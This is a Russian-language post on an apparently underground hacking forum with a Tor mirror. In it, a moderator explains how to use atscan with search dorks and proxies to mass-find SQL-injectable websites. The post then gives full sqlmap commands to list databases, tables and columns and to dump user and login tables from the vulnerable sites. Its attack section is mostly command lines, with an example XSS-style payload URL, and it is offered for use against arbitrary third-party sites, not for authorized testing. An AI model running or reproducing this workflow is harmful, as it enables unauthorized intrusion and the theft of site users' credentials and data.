ATSCAN+SQLMAP поиск и эксплутация sql уязвимостей.

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

APSYHEA

Модератор
Команда форума

APSYHEA

Модератор
Команда форума
15 Янв 2017
168
55
Сегодня расскажу про некий аналог SQLi Dumper под линукс.

Как видим из названия темы, нам подадобится установленные atscan и sqlmap.
Как установить думаю рассказывать не буду.

Начнем с поиска уязвимостей, для этого нужно заготовить дорк, ну или список дорок в текстовом файле.
Код:
atscan --dork "product.php?" --proxy socks4://176.15.122.53:9999 --level 10 -m all --sql
Разберем параметры.
--dork - Поиск по дорке (ам)

--proxy - Использовать прокси
--level - Количество страниц для поиска
-m - Использовать поисковые системы ( all = все )
--sql - искать sql уязвимости.

Вот так можно использовать списки:
Код:
atscan --dork /path/file.txt --proxy /path/file.txt --level 10 -m all --sql
Где path - путь, file.txt - файл со списком.

Ссылки на уязвимсти будут отображены в строке SCAN.
Будут попадатся ссылки такого типа:
Код:
https://www.site.com%22%3Ehead%3Cscript%3Ealert(%27MySQL%20Error%27)%3C%2Fscript%3Ehead%22%3E%22%00
Но нас интересуют только такого типа:
Код:
http://www.site.com/rus/products/product.php?productID=25%27
Отсканировали - идем далее...

Отсканируем с помощью SQLMAP наш уязвимый сайт на наличие баз:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 --dbs
В зависимсоти от ситуации нам могут предложить разные варианты сканирования - читаем соглашаемся, те кто с англиским не знаком - пользуемся переводчиком.

В конце снизу у вас должны отобразиться базы. Выглядят они примерно так:

[ * ] information_schema
[ * ] db300987912
[ * ] USERS


Предположим мы хотим посмотреть таблицы базы USERS, ведем в терминале:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS --tables
Чтобы посмотреть колонки таблицы, напишем:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS -T LOGIN --columns
Чтобы сдампить всю таблицу пишем:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS --dump
Чтобы сдампить определенные колонки - пишем:
Код:
sqlmap -u http://www.site.com/rus/products/product.php?productID=25%27 -D USERS -T LOGIN --dump
Дамп сохраняется по пути:
/root/.sqlmap/output/
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Ну вот собственно и все ;)










 
Последнее редактирование модератором:
  • Лайк
Reactions: sergey021

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя